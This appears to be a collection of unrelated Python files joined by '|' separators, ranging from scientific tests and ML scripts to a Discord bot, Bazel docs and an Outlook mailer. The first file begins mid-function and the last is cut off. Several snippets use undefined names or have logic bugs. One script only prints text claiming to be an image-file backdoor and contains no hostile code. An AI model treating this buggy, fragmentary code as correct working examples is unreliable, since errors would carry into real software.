"""
Check if gravity method works as expected when surface has nans
"""
coordinates = vd.grid_coordinates((1, 3, 7, 10), spacing=1, extra_coords=30.0)
(easting, northing), surface, reference, density = dummy_layer
# Create one layer that has nans on the surface array
surface_w_nans = surface.copy()
indices = [(3, 3), (2, 1)]
for index in indices:
surface_w_nans[index] = np.nan
layer = prism_layer(
(easting, northing), surface_w_nans, reference, properties={"density": density}
)
# Check if it generates the expected gravity field
prisms, rho = prism_layer_with_holes
npt.assert_allclose(
layer.prism_layer.gravity(coordinates, field=field),
prism_gravity(coordinates, prisms, rho, field=field),
)
@pytest.mark.use_numba
@pytest.mark.parametrize("field", ["potential", "g_z"])
def test_prism_layer_gravity_density_nans(
field, dummy_layer, prism_layer_with_holes
): # pylint: disable=redefined-outer-name
"""
Check if prisms is ignored after a nan is found in density array
"""
coordinates = vd.grid_coordinates((1, 3, 7, 10), spacing=1, extra_coords=30.0)
prisms_coords, surface, reference, density = dummy_layer
# Create one layer that has nans on the density array
indices = [(3, 3), (2, 1)]
for index in indices:
density[index] = np.nan
layer = prism_layer(
prisms_coords, surface, reference, properties={"density": density}
)
# Check if warning is raised after passing density with nans
with warnings.catch_warnings(record=True) as warn:
result = layer.prism_layer.gravity(coordinates, field=field)
assert len(warn) == 1
# Check if it generates the expected gravity field
prisms, rho = prism_layer_with_holes
npt.assert_allclose(
result,
prism_gravity(coordinates, prisms, rho, field=field),
)
|
"""
We feed static features along with dynamical ones into LSTM.
Statical feature is replicated [seqlen] times to be transformed into a "sequence", where value
does not change over time. Kind of "fake" sequence.
"""
import numpy as np
from LSTM.lstm_classifier import LSTMClassifier
# general parameters
lstm_nepochs = 20
# load the dataset
print 'Loading the dataset..'
static_train = np.load('/storage/hpc_anna/GMiC/Data/syn_lstm_wins/train_static.npy')
dynamic_train = np.load('/storage/hpc_anna/GMiC/Data/syn_lstm_wins/train_dynamic.npy')
static_val = np.load('/storage/hpc_anna/GMiC/Data/syn_lstm_wins/test_static.npy')
dynamic_val = np.load('/storage/hpc_anna/GMiC/Data/syn_lstm_wins/test_dynamic.npy')
labels_train = np.load('/storage/hpc_anna/GMiC/Data/syn_lstm_wins/train_labels.npy')
labels_val = np.load('/storage/hpc_anna/GMiC/Data/syn_lstm_wins/test_labels.npy')
# transform static features into "fake" sequences
dynamized_static_train = np.zeros((static_train.shape[0], static_train.shape[1], dynamic_train.shape[2]))
for i in range(static_train.shape[0]):
dynamized_static_train[i, :, :] = np.tile(static_train[i, :], (dynamic_train.shape[2], 1)).T
dynamized_static_val = np.zeros((static_val.shape[0], static_val.shape[1], dynamic_val.shape[2]))
for i in range(static_val.shape[0]):
dynamized_static_val[i, :, :] = np.tile(static_val[i, :], (dynamic_val.shape[2], 1)).T
# meld dynamized static and dynamic features together
all_train = np.concatenate((dynamized_static_train, dynamic_train), axis=1)
all_val = np.concatenate((dynamized_static_val, dynamic_val), axis=1)
# dynamic data with LSTM
lstmcl = LSTMClassifier(2000, 0.5, 'adagrad', lstm_nepochs)
model_pos, model_neg = lstmcl.train(all_train, labels_train)
print "LSTM with dynamized static and dynamic features on validation set: %.4f" % lstmcl.test(model_pos, model_neg, all_val, labels_val)
|
#!/usr/bin/env python2.7
import os
import argparse
import syntax_tree as ast
from parse import *
from os.path import join as pjoin
import tac
def main(*args, **kwargs):
default_file = "single_function.x"
default_file = "simple_0.x"
filepath = os.path.dirname(os.path.realpath(__file__))
argument_parser = argparse.ArgumentParser()
argument_parser.add_argument("--input", "-i", default = pjoin(filepath, "../tests/lang/" + default_file))
args = argument_parser.parse_args()
data = open(args.input).read()
try:
program = parse(data)
except ParseError as e:
print(e)
program.make_tables()
try:
program.sema()
except ast.SemaError as e:
print(e)
print(e.ast.end_token.highlight(5, 5))
raise
except KeyError as e:
print(e)
#print(e.ast.start_token.highlight(5, 5))
print(e.ast.end_token.highlight(5, 5))
raise
t = program.make_tac(tac.TacState())
for x in t:
if isinstance(x, (tac.Label, tac.StartFunc, tac.EndFunc)):
print(x)
else:
print("\t{}".format(x))
if isinstance(x, tac.EndFunc):
print("")
graph = program.output_graph("out.png")
if __name__ == "__main__":
main()
|
# You can run this .tac file directly with:
# twistd -ny httpauth.tac
from twisted.web2 import channel, resource, http, responsecode, server
from twisted.web2.auth.interfaces import IAuthenticatedRequest, IHTTPUser
class ProtectedResource(resource.Resource):
"""
A resource that is protected by HTTP Auth
"""
addSlash = True
def render(self, req):
"""
I adapt C{req} to an L{IAuthenticatedRequest} before using the
avatar to return a personalized message.
"""
avatar = IAuthenticatedRequest(req).avatar
return http.Response(
responsecode.OK,
stream=("Hello %s, you've successfully accessed "
"a protected resource." % (avatar.username,)))
from twisted.web2.auth import digest, basic, wrapper
from twisted.cred.portal import Portal
from twisted.cred import checkers
import credsetup
#
# Create the portal with our realm that knows about the kind of avatar
# we want.
#
portal = Portal(credsetup.HTTPAuthRealm())
#
# Create a checker that knows about the type of backend we want to use
# and that knows about the ICredentials we get back from our
# ICredentialFactories. And tell our portal to use it.
#
checker = checkers.InMemoryUsernamePasswordDatabaseDontUse(guest='guest123')
portal.registerChecker(checker)
#
# Set up our HTTPAuthResource, we have to tell it the root of the resource
# heirarchy we want to protect, as well as the credential factories we want
# to support, the portal we want to use for logging in, and the interfaces
# that IAuthenticatedRequest.avatar to may implement.
#
root = wrapper.HTTPAuthResource(ProtectedResource(),
(basic.BasicCredentialFactory('My Realm'),
digest.DigestCredentialFactory('md5',
'My Realm')),
portal, (IHTTPUser,))
site = server.Site(root)
# Start up the server
from twisted.application import service, strports
application = service.Application("HTTP Auth Demo")
s = strports.service('tcp:8080', channel.HTTPFactory(site))
s.setServiceParent(application)
|
import random
import string
from model.contact import Contact
import os.path
import jsonpickle
import getopt
import sys
__author__ = "Grzegorz Holak"
try:
opts, args = getopt.getopt(sys.argv[1:], "n:f:", ["number of Contacts", "file"])
except getopt.GetoptError as err:
getopt.usage()
sys.exit(2)
n = 5
f = "data/contacts.json"
for o, a in opts:
if o == "-n":
n = int(a)
elif o == "-f":
f = a
def random_string(prefix, max_len):
symbols = string.ascii_letters + string.digits + " "
# + string.punctuation to not fail tests as we know that it is not working correctly with this chars
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(max_len))])
def random_email(prefix, max_len_name, max_len_domain):
symbols = string.ascii_letters + string.digits
name = "".join([random.choice(symbols) for i in range(random.randrange(max_len_name))])
domain = "".join([random.choice(symbols) for i in range(random.randrange(max_len_domain))])
end = "".join([random.choice(string.ascii_lowercase) for i in range(1, 3)])
return prefix + "_" + name + "@" + domain + "." + end
def random_phone(prefix, max_len):
symbols = string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(max_len))])
testdata = [
Contact(first_name=random_string("name", 10), last_name=random_string("lastname", 20)
, email=random_email("email1", 10, 10), email2=random_email("email2", 10, 15)
, email3=random_email("e3", 15, 21), address=random_string("address", 50)
, mobile_phone=random_phone("mob", 10), work_phone=random_phone("work", 10)
, home_phone=random_phone("home", 10), home_phone2=random_phone("home2", 11))
for i in range(n)
]
file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", f)
with open(file, "w") as out:
jsonpickle.set_encoder_options("json", indent=2)
out.write(jsonpickle.encode(testdata))
|
from discord.ext import commands, tasks
import core.config
from apps.base import Query
from apps.erp.models import EmployeeTable
from apps.directory.queries import ad_query
from apps.directory.utils import email_to_ad, pretty_ad_user, directory_emojis, ad_user_to_list
class DirectoryTasks(commands.Cog, name='directory_tasks'):
def __init__(self, bot):
self.bot = bot
self.directory_task.start()
self.channel = self.bot.get_channel(core.config.LOA_CHANNEL)
@tasks.loop(seconds=5.0)
async def directory_task(self):
loa_email = Query('email_table').filter('local_read', '0').filter_like('recipient', 'itloa').query()
loa_list = email_to_ad(loa_email)
for email in loa_list:
employee = self.email_to_employee(email)
Query('email_table').update_by_key(email['key'], [('local_read', 1)])
if employee:
ad_acts = self.employee_ad_search(employee)
if len(ad_acts) == 1:
msg = await self.channel.send(embed=pretty_ad_user(ad_acts, employee['command']))
emoji = directory_emojis[employee['command'].lower()]
await msg.add_reaction(emoji)
elif len(ad_acts) > 1:
await self.channel.send('Multiple accounts were found, please select from the below')
for account in ad_acts:
msg = await self.channel.send(embed=pretty_ad_user(account, employee['command']))
emoji = directory_emojis[employee['command'].lower()]
await msg.add_reaction(emoji)
elif not ad_acts:
msg = ''
await self.channel.send(f'No AD account for {employee["first"].capitalize()} {employee["last"].capitalize()} found')
else:
await self.channel.send(f'Employee can not be found (Incorrect Email Format?):\nEEID Provided: {email["id"]}\nCommand Provided: {email["command"]}')
@staticmethod
def email_to_employee(email):
if email['id']:
employee = EmployeeTable().filter('id', email['id'][0]).query()[0]
employee = {'first': employee[1], 'middle': employee[2], 'last': employee[4], 'command': email['command']}
return employee
@staticmethod
def employee_ad_search(employee):
accounts = ad_query(employee['first'], employee['last'])
return accounts
|
from test_inference import create_test_data
from save_load import load_model
model,tokenizer=load_model()
test_data_1="ENTER FIRST SENTENCE HERE"
test_data_2="ENTER SECOND SENTENCE HERE"
max_Seq_len=237
test_data_1, test_data_2=create_test_data(tokenizer=tokenizer,test_sentences_pair=test_sentence_pairs,max_sequence_length=max_Seq_len)
get_predictions(test_data_1, test_data_2,model)
|
import unittest
import os, sys
from numpy import ndarray
from lab.data import Data, DataRandom
from lab.target import TGAlpha
class DataClassTests(unittest.TestCase):
def setUp(self):
self.data = Data()
self.dataStoragePath = "data"
# return super().setUp()
def test_instantiation(self):
self.assertIsInstance(self.data, Data, "it has wrong type")
def test_setArrayOfIntegersAsX(self):
self.data.setX([[1, 2, 3, 4, 5], [1, 2, 3, 4, 5]])
self.assertIsInstance(self.data, Data, "does not accept array of integers")
def test_typeConvertionForX(self):
self.data.setX([[1, 2, 3], [1, 2, 3]])
self.assertIsInstance(
self.data.x[1, 1],
float,
"the type of the data element is different than `float`",
)
def test_stringInArrayAsX(self):
with self.assertRaises(ValueError):
self.data.setX([[1, "a", 3], [1, 2, 3]])
def test_oneDimentionalArrayAsX(self):
with self.assertRaises(Exception):
self.data.setX([1, 2, 3, 4, 5, 6])
def test_storeInFile(self):
url = self.data.save(self.dataStoragePath)
self.assertGreater(len(url), 1, "url to file empty")
size = os.stat(url).st_size
self.assertGreater(size, 1, "file empty")
def test_readFromFile(self):
x = [[100.0, 200.0, 300.0], [1.0, 2.0, 3.0]]
self.data.setX(x)
url = self.data.save(self.dataStoragePath)
d = Data()
d.read(url)
self.assertListEqual(
list(self.data.x.flatten()),
list(d.x.flatten()),
"the data is damaged during store/read operation",
)
def test_makeTarget(self):
self.data.setX([[1, 2, 3], [2, 2, 4], [3, 4, 2]])
tg = TGAlpha()
self.data.makeTarget(tg)
self.assertIsInstance(self.data.y, ndarray, "target is not an array")
def test_targetValues(self):
self.data.setX([[1, 2, 3], [2, 2, 4], [3, 4, 2]])
tg = TGAlpha()
self.data.makeTarget(tg)
self.assertListEqual(
list(set(self.data.y.flatten())),
[0.0, 1.0],
"target class not in set {0., 1.}",
)
class RandomDataClassTests(unittest.TestCase):
def setUp(self):
self.data = DataRandom()
def test_instantiationWithDefaults(self):
self.assertEqual(self.data.x.shape[0], 10000, "wrong observations number")
self.assertEqual(self.data.x.shape[1], 10, "wrong features number")
if __name__ == "__main__":
unittest.main()
|
import pandas as pd
import os, progressbar
from Bio import SeqIO
def collectSeq(proteome):
seqCollection = []
for seqRecord in SeqIO.parse(proteome, format='fasta'):
seqCollection.append((seqRecord.id, str(seqRecord.seq)))
return seqCollection
def createSEQ(resPath, seqTuple):
f = open(os.path.join(resPath,'{}.seq'.format(seqTuple[0])), mode='w')
f.write('{} N N 7 298 0.1 {}\n'.format(seqTuple[0], seqTuple[1]))
f.close()
def collect_aggScore(tangoTable):
proteinID = tangoTable.split('/')[-1].replace('.txt', '')
tmp = pd.read_csv(tangoTable, sep='\t')
agg_score = sum(tmp['Aggregation']) / len(tmp)
return proteinID, agg_score
def collect_aggTable(tangoTable):
proteinID = tangoTable.split('/')[-1].replace('.txt', '')
tmp = pd.read_csv(tangoTable, sep='\t')
return tmp
|
"""
["Make variable"]: https://docs.bazel.build/versions/master/be/make-variables.html
[Bourne shell tokenization]: https://docs.bazel.build/versions/master/be/common-definitions.html#sh-tokenization
[Gazelle]: https://github.com/bazelbuild/bazel-gazelle
[GoArchive]: /go/providers.rst#GoArchive
[GoLibrary]: /go/providers.rst#GoLibrary
[GoPath]: /go/providers.rst#GoPath
[GoSource]: /go/providers.rst#GoSource
[build constraints]: https://golang.org/pkg/go/build/#hdr-Build_Constraints
[cc_library deps]: https://docs.bazel.build/versions/master/be/c-cpp.html#cc_library.deps
[cgo]: http://golang.org/cmd/cgo/
[config_setting]: https://docs.bazel.build/versions/master/be/general.html#config_setting
[data dependencies]: https://docs.bazel.build/versions/master/build-ref.html#data
[goarch]: /go/modes.rst#goarch
[goos]: /go/modes.rst#goos
[mode attributes]: /go/modes.rst#mode-attributes
[nogo]: /go/nogo.rst#nogo
[pure]: /go/modes.rst#pure
[race]: /go/modes.rst#race
[msan]: /go/modes.rst#msan
[select]: https://docs.bazel.build/versions/master/be/functions.html#select
[shard_count]: https://docs.bazel.build/versions/master/be/common-definitions.html#test.shard_count
[static]: /go/modes.rst#static
[test_arg]: https://docs.bazel.build/versions/master/user-manual.html#flag--test_arg
[test_filter]: https://docs.bazel.build/versions/master/user-manual.html#flag--test_filter
[test_env]: https://docs.bazel.build/versions/master/user-manual.html#flag--test_env
[test_runner_fail_fast]: https://docs.bazel.build/versions/master/command-line-reference.html#flag--test_runner_fail_fast
[write a CROSSTOOL file]: https://github.com/bazelbuild/bazel/wiki/Yet-Another-CROSSTOOL-Writing-Tutorial
[bazel]: https://pkg.go.dev/github.com/bazelbuild/rules_go/go/tools/bazel?tab=doc
[go_library]: #go_library
[go_binary]: #go_binary
[go_test]: #go_test
[go_path]: #go_path
[go_source]: #go_source
[go_test]: #go_test
[Examples]: examples.md#examples
[Defines and stamping]: defines_and_stamping.md#defines-and-stamping
[Stamping with the workspace status script]: defines_and_stamping.md#stamping-with-the-workspace-status-script
[Embedding]: embedding.md#embedding
[Cross compilation]: cross_compilation.md#cross-compilation
[Platform-specific dependencies]: platform-specific_dependencies.md#platform-specific-dependencies
# Core Go rules
These are the core go rules, required for basic operation. The intent is that these rules are
sufficient to match the capabilities of the normal go tools.
## Additional resources
- ["Make variable"]
- [Bourne shell tokenization]
- [Gazelle]
- [GoArchive]
- [GoLibrary]
- [GoPath]
- [GoSource]
- [build constraints]:
- [cc_library deps]
- [cgo]
- [config_setting]
- [data dependencies]
- [goarch]
- [goos]
- [mode attributes]
- [nogo]
- [pure]
- [race]
- [msan]
- [select]:
- [shard_count]
- [static]
- [test_arg]
- [test_filter]
- [test_env]
- [test_runner_fail_fast]
- [write a CROSSTOOL file]
- [bazel]
------------------------------------------------------------------------
Introduction
------------
Three core rules may be used to build most projects: [go_library], [go_binary],
and [go_test].
[go_library] builds a single package. It has a list of source files
(specified with `srcs`) and may depend on other packages (with `deps`).
Each [go_library] has an `importpath`, which is the name used to import it
in Go source files.
[go_binary] also builds a single `main` package and links it into an
executable. It may embed the content of a [go_library] using the `embed`
attribute. Embedded sources are compiled together in the same package.
Binaries can be built for alternative platforms and configurations by setting
`goos`, `goarch`, and other attributes.
[go_test] builds a test executable. Like tests produced by `go test`, this
consists of three packages: an internal test package compiled together with
the library being tested (specified with `embed`), an external test package
compiled separately, and a generated test main package.
Rules
-----
"""
load("//go/private/rules:library.bzl", _go_library = "go_library")
load("//go/private/rules:binary.bzl", _go_binary = "go_binary")
load("//go/private/rules:test.bzl", _go_test = "go_test")
load("//go/private/rules:source.bzl", _go_source = "go_source")
load("//go/private/tools:path.bzl", _go_path = "go_path")
go_library = _go_library
go_binary = _go_binary
go_test = _go_test
go_source = _go_source
go_path = _go_path
|
import sys
from example_pkg import YoDude
def main():
print(f"command_line sys.argv={sys.argv}")
s: str = "hi there"
if len(sys.argv) > 1:
s = " ".join(sys.argv[1:])
yd = YoDude(s)
yd.hello()
|
import click
from typing import List
from gonews.utils import GoNews
news = GoNews()
@click.group('cli')
def cli():
pass
@cli.command('top-stories')
@click.option('--max-stories', '-ms', type=int, default=None, required=False, help='Max number of stories to retrieve')
def top_stories(max_stories: int = None):
"""Print current top stories"""
news.top_stories(max_stories=max_stories)
@cli.command('top-stories-by-location')
@click.option('--city', '-c', type=str, required=True, help='City name')
@click.option('--state', '-s',
type=click.Choice(list(news.states.keys())+list(news.states.values()), case_sensitive=False),
required=True, help='State name. NOTE: Not case sensitive')
@click.option('--max-stories', '-ms', type=int, default=None, required=False, help='Max number of stories to retrieve')
def top_stories_by_location(city:str, state: str, max_stories: int = None):
"""Print current top stories for city, state"""
news.top_stories_by_location(city, state, max_stories=max_stories)
@cli.command('search-stories')
@click.option('--query', '-q', type=str, required=True, help='Exact search term')
@click.option('--has-word', '-hw', type=str, required=False, multiple=True, help='Stories should have given word')
@click.option('--exclude-word', '-ew', type=str, required=False, multiple=True,
help='Stories should not contain given word')
@click.option('--timeframe', '--t', type=click.Choice(['1d', '7d', '14d', '30d', '1y']), required=False, default='1d',
help='Stories from this timeframe')
@click.option('--max-stories', '-ms', type=int, default=None, required=False, help='Max number of stories to retrieve')
def search_stories(query: str, has_word: List[str], exclude_word: List[str], timeframe: str, max_stories: int = None):
"""Print top stories based on search"""
has_word = list(has_word)
exclude_word = list(exclude_word)
news.search_stories(query, has_words=has_word, exclude_words=exclude_word, when=timeframe, max_stories=max_stories)
if __name__ == '__main__':
cli()
|
# third party
import pytest
# syft absolute
import syft as sy
from syft.util import get_root_data_path
@pytest.mark.vendor(lib="statsmodels")
def test_glm(root_client: sy.VirtualMachineClient) -> None:
# stdlib
import os
import re
import shutil
import urllib.request
# third party
import pandas as pd
import statsmodels
FAMILY = [
statsmodels.genmod.families.Binomial,
statsmodels.genmod.families.Gamma,
statsmodels.genmod.families.Gaussian,
statsmodels.genmod.families.InverseGaussian,
statsmodels.genmod.families.NegativeBinomial,
statsmodels.genmod.families.Poisson,
statsmodels.genmod.families.Tweedie,
]
UNNECESSARY_STR = r"Time(.*)(?=Pearson)|Date(.*)(?=Deviance)"
sy.load("pandas")
sy.load("statsmodels")
# download data
csv_file = "mort_match_nhis_all_years.csv"
zip_file = f"{csv_file}.zip"
url = f"https://datahub.io/madhava/mort_match_nhis_all_years/r/{zip_file}"
data_path = f"{get_root_data_path()}/CDC"
zip_path = f"{data_path}/{zip_file}"
csv_path = f"{data_path}/{csv_file.upper()}"
if not os.path.exists(zip_path):
os.makedirs(data_path, exist_ok=True)
urllib.request.urlretrieve(url, zip_path)
if not os.path.exists(csv_path):
shutil.unpack_archive(zip_path, data_path)
assert os.path.exists(csv_path)
# load data
df = pd.read_csv(csv_path)
df = df.head(100)
df_ptr = df.send(root_client)
# Drop any missing values in the dataset (those under 18)
df = df.dropna(subset=["MORTSTAT"])
df_ptr = df_ptr.dropna(subset=["MORTSTAT"])
# Keep only the eligible portion
df = df[df["ELIGSTAT"] == 1]
df_ptr = df_ptr[df_ptr["ELIGSTAT"] == 1]
# Ignore people > 80
df = df[df["AGE_P"] <= 80]
df_ptr = df_ptr[df_ptr["AGE_P"] <= 80]
# A person is alive if MORTSTAT==0
df["is_alive"] = df["MORTSTAT"] == 0
df_ptr["is_alive"] = df_ptr["MORTSTAT"] == 0
# Assign a helpful column for sex (0==male, 1==female)
df["sex"] = "male"
df_ptr["sex"] = "male"
# df.loc[df["SEX"] == 2, "sex"] = "female"
# explanatory variable
x = df["AGE_P"]
x_ptr = df_ptr["AGE_P"]
# add constant
_x = statsmodels.api.add_constant(x)
_x_ptr = root_client.statsmodels.api.add_constant(x_ptr)
# dependent variable
_y = df["is_alive"]
_y_ptr = df_ptr["is_alive"]
# test all possible combinations of families and links
for family in FAMILY:
for link in family.links:
model = statsmodels.genmod.generalized_linear_model.GLM(
_y, _x, family=family(link=link())
)
result = model.fit()
summary = result.summary().as_csv()
remote_model = root_client.statsmodels.genmod.generalized_linear_model.GLM(
_y_ptr, _x_ptr, family=family(link=link())
)
remote_result = remote_model.fit()
# `get` corresponds to `summary().as_csv()`
remote_summary = remote_result.get()
# remove unnnecessary strings such as proccesing time and date
summary = re.sub(UNNECESSARY_STR, "", summary)
remote_summary = re.sub(UNNECESSARY_STR, "", remote_summary)
assert summary == remote_summary
|
# -*- coding: utf-8 -*-
"""
for installing with pip
"""
from distutils.core import setup
from setuptools import find_packages
setup(
name='mu3',
version='0.0.1',
author='Mark V',
author_email='noreply.mail.nl',
packages=find_packages(),
include_package_data=True,
url='git+https://bitbucket.org/mverleg/mu3',
license='free to use without permission, but only at your own risc',
description='base for my Django projects',
zip_safe=False,
install_requires = [
'django',
'django-reversion',
# 'django-profiles',
# 'django-uni-forms',
#todo
],
)
|
import sys
print("zad1")
list = []
for i in range (1,100):
if (i%4 == 0):
list.append(i)
file1 = open("ex1.txt", "w")
file1.write(str(list))
file1.close()
print("\nzad2")
file1 = open("ex1.txt","r")
divisible_by_4 = file1.read()
print(divisible_by_4)
file1.close()
print("\nzad3")
text = "\nNumbers divisible by 4."
with open ("ex1.txt", "a+") as file1:
file1.write(text)
print(text)
|
import argparse
import json
import logging
import os
import socket
import time
from .dispatcher import Dispatcher
from .eventlog import EventLog
from .logs import setup_logs, log_globals
from .utils import try_call_except_traceback
def main(argv=None):
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbose', action='store_true')
parser.add_argument('-p', '--plugin-dir', action='append')
parser.add_argument('-s', '--state-path')
parser.add_argument('-l', '--log-dir')
parser.add_argument('-e', '--email-errors', action='append')
args = parser.parse_args(argv)
# Set a global socket timeout, so that nothing socket related will ever
# lock us up. This is likely to cause a few extra problems, but we can
# deal with them.
socket.setdefaulttimeout(60.1)
smtp_args = (
'localhost',
'sgevents@mail.westernx',
args.email_errors,
'SGEvents on %s' % socket.gethostname(),
) if args.email_errors else None
setup_logs(debug=args.verbose, file_dir=args.log_dir, smtp_args=smtp_args)
state = {}
state_path = args.state_path
if state_path:
state_dir = os.path.dirname(os.path.abspath(state_path))
if not os.path.exists(state_dir):
os.makedirs(state_dir)
if os.path.exists(state_path):
try:
state = json.load(open(state_path))
except ValueError as e:
print e
dispatcher = Dispatcher()
for plugin_dir in args.plugin_dir or ():
dispatcher.load_plugins(plugin_dir)
event_log = EventLog(extra_fields=dispatcher.get_extra_fields(), last_id=state.get('last_id'))
def on_event(event):
try:
dispatcher.dispatch(event)
finally:
if state_path:
state['last_id'] = event.id
with open(state_path, 'w') as fh:
fh.write(json.dumps(state))
# Be hyper-vigilant.
while True:
try_call_except_traceback(event_log.process_events_forever, on_event)
time.sleep(10)
if __name__ == '__main__':
# We REALLY don't want to be using the cache for this stuff.
os.environ.pop('SGCACHE', None)
main()
|
import datetime
print datetime.datetime.now()
print "Put your script of python here."
print "This is Simple Backdoor in image file, then execute with python programming."
|
# Given a 2D board and a list of words from the dictionary, find all words in the board.
#
# Each word must be constructed from letters of sequentially adjacent cell, where "adjacent" cells are those horizontally or vertically neighboring. The same letter cell may not be used more than once in a word.
#
# Example:
#
# Input:
# words = ["oath","pea","eat","rain"] and board =
# [
# ['o','a','a','n'],
# ['e','t','a','e'],
# ['i','h','k','r'],
# ['i','f','l','v']
# ]
#
# Output: ["eat","oath"]
# Note:
# You may assume that all inputs are consist of lowercase letters a-z.
import collections
class TrieNode():
def __init__(self):
self.children = collections.defaultdict(TrieNode)
self.isWord = False
class Trie():
def __init__(self):
self.root = TrieNode()
def insert(self, word):
node = self.root
for w in word:
node = node.children[w]
node.isWord = True
def search(self, word):
node = self.root
for w in word:
node = node.children.get(w)
if not node:
return False
return node.isWord
class Solution(object):
def findWords(self, board, words):
"""
:type board: List[List[str]]
:type words: List[str]
:rtype: List[str]
"""
res = []
trie = Trie()
node = trie.root
for word in words:
trie.insert(word)
for i in range(len(board)):
for j in range(len(board[0])):
self.dfs(board, node, i, j, '', res)
return res
def dfs(self, board, node, i, j, path, res):
if node.isWord:
res.append(path)
node.isWord = False
if i < 0 or i >= len(board) or j < 0 or j >= len(board[0]):
return
t = board[i][j]
node = node.children.get(t)
if not node:
return
board[i][j] = ''
map(lambda x: self.dfs(board, node, x[0], x[1], path + t, res),
[(i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1)])
board[i][j] = t
|
from max6675 import MAX6675
from machine import Pin
import time
so = Pin(12, Pin.IN)
sck = Pin(14, Pin.OUT)
cs = Pin(16, Pin.OUT)
max = MAX6675(sck, cs , so)
for _ in range(10):
print(max.read())
time.sleep(1)
|
import win32com.client as win32
#Criar integração com o e-mail
outlook = win32.Dispatch('outlook.application')
#criar um e-mail
email = outlook.CreateItem(0)
#Configurar informações do e-mail
email.To = "josievinileite@gmail.com"
email.Subject = "Teste de automatização"
email.HTMLBody = f"""
<h1>Automatizando e-mails com python</h1>
"""
#Enviando um anexo
anexo = "C:/Users/vinicius/Desktop/teste.xlsx"
email.Attachments.Add(anexo)
#Enviar o e-mail
email.Send()
print("O e-mail foi enviado com sucesso")
|
import os, shutil, datetime
import cg_pyrosetta
import pyrosetta
import mdtraj as md
from simtk import unit
import foldamers
from foldamers.utilities.iotools import write_pdbfile_without_topology
from foldamers.utilities.util import *
from cg_openmm.simulation.tools import *
from cg_openmm.build.cg_build import *
from foldamers.cg_model.cgmodel import *
# Identify the Rosetta database directory
pyrosetta_database_path = pyrosetta._rosetta_database_from_env()
def get_bonded_particle_list(residue):
"""
Returns the list of names for particles that are bonded together in this residue.
Parameters
----------
residue: A dictionary containing information about the particles in a residue/monomer type
Returns
-------
bonded_list: A list of the particles that are bonded together in this residue type.
List([[atom_1_name(str),atom_2_name(str)]])
"""
bonded_list = []
atom_1_name = str("BB1")
for backbone_bead in residue['backbone_length']:
if backbone_bead != 0:
atom_2_name = str("BB"+str(backbone_bead+1))
bonded_list.append([atom_1_name,atom_2_name])
atom_1_name = atom_2_name
if backbone_bead in residue['sidechain_positions']:
for sidechain_bead in residue['sidechain_length']:
atom_2_name = str("SC"+str(sidechain_bead+1))
bonded_list.append([atom_1_name,atom_2_name])
atom_1_name = atom_2_name
if residue['sidechain_length'] == 1:
atom_2_name = str("VIRT")
bonded_list.append([atom_1_name,atom_2_name])
atom_1_name = str("BB"+str(backbone_bead+1))
return(bonded_list)
def get_monomer_internal_coordinates(cgmodel,monomer_type):
"""
Returns a list of internal coordinates for a monomer/residue, give n a cgmodel class object and a monomer_type dictionary. (Used to construct a residue .params file for PyRosetta.)
Parameters
----------
cgmodel: CGModel() class object
monomer_type: A dictionary containing information about the particles in a residue/monomer type
Returns
-------
internal_coordinates: A list of internal coordinates for 'monomer_type'
List([strings])
"""
# Building internal coordinates for residue .params files in PyRosetta using the example here:
# https://www.rosettacommons.org/docs/latest/rosetta_basics/file_types/Residue-Params-file
monomer_positions = cgmodel.positions[0:monomer_type['num_beads']]
internal_coordinates = []
bonded_particle_list = get_bonded_particle_list(monomer_type)
torsion_index = 0
# Build monomer internal coordinates by iterating over the list of torsions in the cgmodel
for torsion in cgmodel.torsion_list:
if all(torsion) < monomer_type['num_beads']:
# Construct a list of atoms from which to build an internal coordinate line
if torsion_index == 0:
atom_a1,atom_a2,atom_a3,atom_a4 = cgmodel.particle_list[torsion[2]],cgmodel.particle_list[torsion[1]],cgmodel.particle_list[torsion[0]],cgmodel.particle_list[torsion[0]]
else:
atom_a1,atom_a2,atom_a3,atom_a4 = cgmodel.particle_list[torsion[3]],cgmodel.particle_list[torsion[2]],cgmodel.particle_list[torsion[1]],cgmodel.particle_list[torsion[0]]
# Determine the bond length for this internal coordinate line
if atom_a3 == atom_a4:
bond_length = 0.0
else:
bond_length = get_bond_length_from_names(cgmodel,atom_a3,atom_a4)
# Determine theta for this internal coordinate line
if atom_a3 == atom_a4:
theta = 0.0
if atom_a2 == atom_a4:
theta = 180.0
if atom_a3 != atom_a4 and atom_a2 != atom_a4:
theta = 180.0 - get_bond_angle_from_names(cgmodel,atom_a4,atom_a3,atom_a2)
# Determine phi for this internal coordinate line
if len(torsions) > len(set(torsions)):
phi = 0.0
else:
phi = get_torsion_from_names(cgmodel,atom_a4,atom_a3,atom_a2,atom_a1)
# Construct a line from the coordinate values chosen.
line_list = ['ICOOR_INTERNAL ',atom_a4,phi,theta,bond_length,atom_a3,atom_a2,atom_a1]
line = '%18s%4s %10s %10s %9s %4s %4s %4s' % (line_list[i] for i in len(line_list))
internal_coordinates.append(line)
torsion_index = torsion_index + 1
return(internal_coordinates)
def remove_existing_atom_types(atom_properties_file,list_of_atoms_to_remove):
"""
Given a 'list_of_atoms_to_remove' and the path to a PyRosetta database file containing atom properties ('atom_properties.txt'), this function removes old atom types.
Parameters
----------
atom_properties_file: Path to the PyRosetta database file containing atom type properties ('atom_properties.txt')
list_of_atoms_to_remove: List of atom types to remove from the database.
"""
file_obj = open(atom_properties_file,'r')
lines = file_obj.readlines()
file_obj.close()
file_obj = open(atom_properties_file,'w')
for line in lines:
atom_type = line.split(' ')[0]
if atom_type not in list_of_atoms_to_remove:
file_obj.write(line)
file_obj.close()
return
def get_existing_atom_types(atom_properties_file):
"""
Given the path to a PyRosetta database file, 'atom_properties.txt', this function reads the file and returns a list of atom type names.
Parameters
----------
atom_properties_file: Path to the PyRosetta database file containing atom type properties ('atom_properties.txt')
Returns
-------
existing_atom_types_list: List of existing atom types.
"""
existing_atom_types_list = []
file_obj = open(file_name,'r')
lines = file_obj.readlines()
for line in lines:
if line[0] != '#':
atom_type = line.split(' ')[0]
existing_atom_types_list.append(atom_type)
return(existing_atom_types_list)
def write_mm_atom_properties_txt(cgmodel,list_of_atoms_to_add):
"""
Given a cgmodel and a 'list_of_atoms_to_add', this function adds the atoms to 'mm_atom_properties.txt'.
Parameters
----------
